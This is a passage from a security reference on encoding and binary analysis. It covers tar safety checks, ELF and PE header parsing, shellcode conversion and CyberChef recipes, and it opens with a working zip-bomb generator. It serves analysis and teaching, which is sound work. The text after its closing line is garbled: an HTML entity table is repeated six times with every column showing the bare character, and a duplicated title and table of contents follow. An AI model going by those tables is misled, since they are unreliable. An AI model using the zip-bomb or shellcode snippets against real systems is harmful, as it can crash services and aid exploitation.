    """Create a single-layer zip bomb. Testing only."""
    with zipfile.ZipFile(output, 'w', zipfile.ZIP_DEFLATED) as zf:
        # Highly compressible data
        zf.writestr('bomb.txt', b'\x00' * uncompressed_size)

tar analysis and attacks

# List tar contents (check for path traversal)
tar -tvf archive.tar | grep -E '^\.\./|^/'

# Safe extraction (GNU tar strips leading / by default)
tar --no-same-owner --no-same-permissions -xvf archive.tar -C /tmp/safe/

# Check for symlink attacks
tar -tvf archive.tar | grep '^l'

import tarfile

# Detect dangerous tar entries
def check_tar_safety(tar_path: str) -> list[str]:
    issues = []
    with tarfile.open(tar_path) as tf:
        for member in tf.getmembers():
            # Path traversal
            if member.name.startswith('/') or '..' in member.name:
                issues.append(f"PATH_TRAVERSAL: {member.name}")
            # Symlink outside extraction directory
            if member.issym() or member.islnk():
                issues.append(f"SYMLINK: {member.name} -> {member.linkname}")
            # Setuid/setgid bits
            if member.mode & 0o4000 or member.mode & 0o2000:
                issues.append(f"SETUID/SETGID: {member.name} mode={oct(member.mode)}")
            # Device files
            if member.isdev():
                issues.append(f"DEVICE_FILE: {member.name}")
    return issues

# Safe extraction (Python 3.12+ has filter parameter)
# tarfile.open(path).extractall(dest, filter='data')  # Python 3.12+

14. Binary & Struct Manipulation

struct packing and unpacking

import struct

# Format characters:
# < little-endian    > big-endian    ! network (big-endian)    = native
# b/B signed/unsigned byte (1)
# h/H signed/unsigned short (2)
# i/I signed/unsigned int (4)
# l/L signed/unsigned long (4)
# q/Q signed/unsigned long long (8)
# f   float (4)       d   double (8)
# s   char[] (bytes)  p   pascal string
# x   padding byte

# Pack values into binary
packed = struct.pack('<IHH', 0xdeadbeef, 0x1234, 0x5678)
print(packed.hex())   # efbeadde34127856 (little-endian)

# Unpack binary to values
values = struct.unpack('<IHH', packed)
print([hex(v) for v in values])  # ['0xdeadbeef', '0x1234', '0x5678']

# Network byte order (big-endian) for IP/TCP
import socket
ip_packed = socket.inet_aton("192.168.1.1")   # b'\xc0\xa8\x01\x01'
ip_int = struct.unpack('!I', ip_packed)[0]     # 3232235777
ip_str = socket.inet_ntoa(struct.pack('!I', ip_int))  # '192.168.1.1'

# Pack a C struct
# struct header { uint32_t magic; uint16_t version; uint16_t flags; uint32_t size; };
header = struct.pack('<IHHI', 0x7f454c46, 2, 1, 0x1000)

# Unpack with named fields (using namedtuple)
from collections import namedtuple
Header = namedtuple('Header', 'magic version flags size')
parsed = Header._make(struct.unpack('<IHHI', header))
print(f"Magic: {parsed.magic:#x}, Version: {parsed.version}")

Endianness

# Little-endian: least significant byte first (x86, ARM default)
# Big-endian: most significant byte first (network order, MIPS, SPARC)

value = 0xdeadbeef

# Manual conversion
le_bytes = value.to_bytes(4, 'little')   # b'\xef\xbe\xad\xde'
be_bytes = value.to_bytes(4, 'big')      # b'\xde\xad\xbe\xef'

# Swap endianness
def swap_endian_32(val: int) -> int:
    return struct.unpack('<I', struct.pack('>I', val))[0]

def swap_endian_16(val: int) -> int:
    return struct.unpack('<H', struct.pack('>H', val))[0]

# Detect endianness of a binary
def detect_endianness(data: bytes, offset: int, expected: int) -> str:
    """Check if value at offset matches expected in LE or BE."""
    le_val = struct.unpack_from('<I', data, offset)[0]
    be_val = struct.unpack_from('>I', data, offset)[0]
    if le_val == expected:
        return 'little-endian'
    elif be_val == expected:
        return 'big-endian'
    return 'unknown'

# Python int methods
val = int.from_bytes(b'\xef\xbe\xad\xde', 'little')   # 0xdeadbeef
val = int.from_bytes(b'\xde\xad\xbe\xef', 'big')       # 0xdeadbeef

ELF header parsing

import struct
from collections import namedtuple

def parse_elf_header(data: bytes) -> dict:
    """Parse ELF file header."""
    if data[:4] != b'\x7fELF':
        raise ValueError("Not an ELF file")

    ei_class = data[4]      # 1=32-bit, 2=64-bit
    ei_data = data[5]       # 1=LE, 2=BE
    ei_version = data[6]    # 1=current
    ei_osabi = data[7]      # 0=SYSV, 3=Linux, etc.

    endian = '<' if ei_data == 1 else '>'
    bits = 32 if ei_class == 1 else 64

    if bits == 64:
        # e_type(2) e_machine(2) e_version(4) e_entry(8) e_phoff(8) e_shoff(8)
        # e_flags(4) e_ehsize(2) e_phentsize(2) e_phnum(2) e_shentsize(2)
        # e_shnum(2) e_shstrndx(2)
        fmt = f'{endian}HHIQQQIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields
    else:
        fmt = f'{endian}HHIIIIIHHHHHH'
        fields = struct.unpack_from(fmt, data, 16)
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, \
        e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx = fields

    ELF_TYPES = {0: 'ET_NONE', 1: 'ET_REL', 2: 'ET_EXEC', 3: 'ET_DYN', 4: 'ET_CORE'}
    MACHINES = {0x3: 'x86', 0x3E: 'x86_64', 0x28: 'ARM', 0xB7: 'AArch64',
                0x08: 'MIPS', 0xF3: 'RISC-V'}

    return {
        'class': f'{bits}-bit',
        'endian': 'little' if ei_data == 1 else 'big',
        'type': ELF_TYPES.get(e_type, f'0x{e_type:x}'),
        'machine': MACHINES.get(e_machine, f'0x{e_machine:x}'),
        'entry_point': f'0x{e_entry:x}',
        'ph_offset': e_phoff,
        'ph_count': e_phnum,
        'sh_offset': e_shoff,
        'sh_count': e_shnum,
    }

# Usage:
# with open('/bin/ls', 'rb') as f:
#     info = parse_elf_header(f.read(64))
#     for k, v in info.items():
#         print(f"{k}: {v}")

# Quick ELF analysis
readelf -h /bin/ls            # full header
readelf -l /bin/ls            # program headers (segments)
readelf -S /bin/ls            # section headers
readelf -d /bin/ls            # dynamic section (libraries)
readelf -s /bin/ls            # symbol table
objdump -d /bin/ls | head -50 # disassembly

# Check for security features
checksec --file=/bin/ls       # RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH

PE header parsing

import struct

def parse_pe_header(data: bytes) -> dict:
    """Parse PE (Windows executable) header."""
    if data[:2] != b'MZ':
        raise ValueError("Not a PE file")

    # e_lfanew: offset to PE signature (at offset 0x3C)
    pe_offset = struct.unpack_from('<I', data, 0x3C)[0]

    if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
        raise ValueError("Invalid PE signature")

    # COFF header (20 bytes after PE signature)
    coff_offset = pe_offset + 4
    machine, num_sections, timestamp, sym_table, num_symbols, \
    opt_header_size, characteristics = struct.unpack_from('<HHIIIHH', data, coff_offset)

    MACHINES = {0x14c: 'x86', 0x8664: 'x86_64', 0xAA64: 'ARM64'}

    # Optional header magic
    opt_offset = coff_offset + 20
    opt_magic = struct.unpack_from('<H', data, opt_offset)[0]
    pe_type = 'PE32+' if opt_magic == 0x20b else 'PE32'

    # Entry point and image base
    if pe_type == 'PE32+':
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<Q', data, opt_offset + 24)[0]
    else:
        entry_rva = struct.unpack_from('<I', data, opt_offset + 16)[0]
        image_base = struct.unpack_from('<I', data, opt_offset + 28)[0]

    import datetime
    try:
        compile_time = datetime.datetime.utcfromtimestamp(timestamp).isoformat()
    except (OSError, ValueError):
        compile_time = f"raw: {timestamp}"

    return {
        'type': pe_type,
        'machine': MACHINES.get(machine, f'0x{machine:x}'),
        'sections': num_sections,
        'compile_time': compile_time,
        'entry_point_rva': f'0x{entry_rva:x}',
        'image_base': f'0x{image_base:x}',
        'characteristics': f'0x{characteristics:x}',
        'is_dll': bool(characteristics & 0x2000),
        'is_exe': bool(characteristics & 0x0002),
    }

# Usage:
# with open('malware.exe', 'rb') as f:
#     info = parse_pe_header(f.read(1024))

Shellcode extraction and analysis

# Extract shellcode from various formats

def shellcode_from_c_array(c_code: str) -> bytes:
    """Parse C-style shellcode: unsigned char buf[] = {0x6a,...};"""
    import re
    hex_vals = re.findall(r'0x([0-9a-fA-F]{1,2})', c_code)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_from_escaped(escaped: str) -> bytes:
    """Parse \\x escape format: \\x6a\\x02\\x58"""
    import re
    hex_vals = re.findall(r'\\x([0-9a-fA-F]{2})', escaped)
    return bytes(int(h, 16) for h in hex_vals)

def shellcode_to_c_array(data: bytes, var_name: str = "buf") -> str:
    """Convert bytes to C array format."""
    hex_vals = ', '.join(f'0x{b:02x}' for b in data)
    return f'unsigned char {var_name}[] = {{{hex_vals}}};'

def shellcode_to_python(data: bytes) -> str:
    """Convert bytes to Python bytes literal."""
    return 'shellcode = b"' + ''.join(f'\\x{b:02x}' for b in data) + '"'

# Null byte detection (important for buffer overflow exploits)
def check_bad_chars(shellcode: bytes, bad_chars: bytes = b'\x00') -> list[int]:
    """Find positions of bad characters in shellcode."""
    positions = []
    for i, b in enumerate(shellcode):
        if b in bad_chars:
            positions.append(i)
    return positions

# Common bad characters for testing
ALL_BAD_CHARS = bytes(range(256))  # Generate all bytes, test which get mangled

# Extract shellcode from binary at specific offset
dd if=payload.bin bs=1 skip=1024 count=256 2>/dev/null | xxd -p | tr -d '\n'

# Disassemble shellcode
echo -ne '\x6a\x02\x58\x99\x48\x89\xd7\x48\x31\xf6\x0f\x05' | ndisasm -b 64 -

# Test shellcode (DANGEROUS — sandbox only)
# gcc -z execstack -o test test.c && ./test

15. CyberChef Reference

CyberChef is a browser-based data manipulation tool — "The Cyber Swiss Army Knife." All operations run client-side; no data leaves the browser. Source: github.com/gchq/CyberChef (34k+ stars).

Key features

Feature	Description
Drag-and-drop recipes	Chain operations visually
Auto Bake	Real-time output as input/recipe changes
Magic	Auto-detect encoding and suggest decode steps
Breakpoints	Step through recipe stages to inspect intermediate data
File support	Handle files up to ~2 GB
URL sharing	Share complete recipes via URL parameters
Client-side	No data sent to any server

Most-used operations for security work

Category	Operations
Encoding	To/From Base64, Base32, Base58, Base85, Hex, Decimal, Binary, Octal, Braille, Morse
URL/HTML	URL Encode/Decode, HTML Entity Encode/Decode
Crypto	AES/DES/3DES/Blowfish/RC4 Encrypt/Decrypt, XOR, ROT13, ROT47, Vigenere
Hashing	MD5, SHA-1, SHA-256, SHA-512, SHA-3, HMAC, bcrypt, scrypt, NTLM
Compression	Gunzip, Gzip, Zip, Bzip2, Raw Inflate/Deflate, Zlib
Data format	Parse JSON, XML, CSV, protobuf, MessagePack, BSON
Networking	Parse IP, Parse URI, DNS over HTTPS, HTTP request, Defang URL/IP
Analysis	Entropy, Frequency distribution, Detect file type, Strings, Hexdump
Code	JavaScript/PHP/XML Beautify/Minify, Disassemble x86, Parse ASN.1
Visual	Render Image, Play Media, Render Markdown
Forensics	Extract files (binwalk-style), Parse TLS, Parse X.509, Windows Filetime
Flow	Fork, Merge, Register, Conditional Jump, Label, Comment

Useful CyberChef recipes (bookmark these)

Decode multi-layer obfuscation:

From_Base64 -> Gunzip -> From_Hex -> XOR({'key':'secret'})

Extract IOCs from text:

Extract_IP_addresses -> Defang_IP_Addresses

Decode PowerShell -EncodedCommand:

From_Base64 -> Decode_text('UTF-16LE')

Analyze suspicious file:

Detect_File_Type -> Entropy -> Strings

JWT decode:

JWT_Decode

Timestamp conversion:

From_UNIX_Timestamp -> To_ISO_8601
Windows_Filetime_to_UNIX -> From_UNIX_Timestamp

Defang indicators for safe sharing:

Defang_URL -> Defang_IP_Addresses
# Converts http://evil.com -> hxxp[://]evil[.]com

CyberChef from the command line

# Self-host CyberChef (no external dependencies)
git clone https://github.com/gchq/CyberChef.git
cd CyberChef && npx grunt prod
# Open build/prod/index.html in browser — fully offline

# Or use Docker
docker run -p 8080:8080 ghcr.io/gchq/cyberchef:latest

# Node.js API (for automation)
# npm install cyberchef
# const chef = require("cyberchef");
# chef.bake("input", [chef.toBase64()]);

Appendix: Quick Conversion Table

From	To	Python	Bash
String	Base64	`base64.b64encode(s.encode())`	`echo -n "s" \| base64`
Base64	String	`base64.b64decode(b).decode()`	`echo "b" \| base64 -d`
String	Hex	`s.encode().hex()`	`echo -n "s" \| xxd -p`
Hex	String	`bytes.fromhex(h).decode()`	`echo "h" \| xxd -r -p`
String	URL	`quote(s, safe='')`	`python3 -c "from urllib.parse import quote; print(quote('s',safe=''))"`
String	HTML	`html.escape(s)`	`python3 -c "import html; print(html.escape('s'))"`
String	MD5	`hashlib.md5(s.encode()).hexdigest()`	`echo -n "s" \| md5sum`
String	SHA256	`hashlib.sha256(s.encode()).hexdigest()`	`echo -n "s" \| sha256sum`
String	NTLM	`hashlib.new('md4',s.encode('utf-16-le')).hexdigest()`	`echo -n "s" \| iconv -t utf-16le \| openssl dgst -md4`
String	ROT13	`codecs.encode(s, 'rot_13')`	`echo "s" \| tr 'A-Za-z' 'N-ZA-Mn-za-m'`
Int	Hex	`hex(n)`	`printf '%x' n`
Hex	Int	`int(h, 16)`	`echo $((16#h))`
Bytes	XOR	`bytes(b^k for b in data)`	`python3 -c "..."`

Appendix: Hash Length Identification

Length	Possible types	Hashcat mode
16	MySQL 3.x	200
32	MD5, NTLM, MD4	0, 1000, 900
40	SHA-1	100
56	SHA-224	1300
64	SHA-256	1400
96	SHA-384	10800
128	SHA-512	1700
32:32	NetNTLMv1	5500
variable	NetNTLMv2	5600
13	DES crypt	1500
34	MD5 crypt ($1$)	500
34	bcrypt ($2a$)	3200
43	SHA-256 crypt ($5$)	7400
86	SHA-512 crypt ($6$)	1800

Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`

Encoding, Decoding & Data Manipulation — Ultimate Reference

Encoding, Decoding & Data Manipulation — Ultimate Reference

Table of Contents

1. Base Encoding

Base64

Base32

Base58

Base85 (Ascii85)

Base encoding detection heuristics

2. Hex Encoding

Hex to/from ASCII

Hex to/from Binary and Decimal

3. URL Encoding

Single encoding

Double encoding (WAF bypass)

Unicode URL encoding

4. HTML Entities

Named entities

Numeric (decimal) entities

Hex entities

Quick reference table

5. Unicode

UTF-8 encoding internals

UTF-16 encoding

Punycode (IDN homograph attacks)

Homoglyph attacks

Zero-width characters (steganography / watermarking)

Unicode normalization attacks

6. Hashing

MD5 (128-bit, BROKEN for collision resistance)

SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)

SHA-256 (256-bit, current standard)

SHA-512 (512-bit)

NTLM (Windows password hash)

Net-NTLMv2 (challenge-response, captured on the wire)

Multi-hash utility

7. XOR

Single-byte XOR

Multi-byte XOR

Single-byte XOR brute force

Known-plaintext XOR attack

8. ROT13 / ROT47 / Caesar

ROT13 (letters only, A-Z / a-z shifted by 13)

ROT47 (printable ASCII 33-126, shifted by 47)

General Caesar cipher (arbitrary shift)

9. JWT (JSON Web Tokens)

Decode JWT (no verification)

Forge JWT with alg:none attack (CVE-2015-9235)

Forge JWT with HMAC/RSA confusion (CVE-2016-10555)

Crack JWT secret (HS256)

JWT security checklist

10. Regular Expressions for Security

IPv4 / IPv6

URLs

Email

Hashes (for IOC extraction)

CVE IDs

Credit card numbers (PCI DSS scanning)

SSN (US Social Security Number)

API keys and secrets

Combined IOC extractor

11. Obfuscation & Deobfuscation

JavaScript obfuscation patterns

PowerShell obfuscation patterns

Python obfuscation patterns

PHP obfuscation patterns

12. Serialization Security

JSON

XML (XXE, XSS, billion laughs)

YAML (arbitrary code execution)

Python pickle (arbitrary code execution)

PHP serialize/unserialize

13. Compression Security

gzip analysis

ZIP analysis and attacks

ZIP bomb (decompression bomb)

tar analysis and attacks

14. Binary & Struct Manipulation

struct packing and unpacking

Endianness

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`

Character	Named	Decimal	Hex
`<`	`<`	`<`	`<`
`>`	`>`	`>`	`>`
`&`	`&`	`&`	`&`
`"`	`"`	`"`	`"`
`'`	`'`	`'`	`'`
`/`	—	`/`	`/`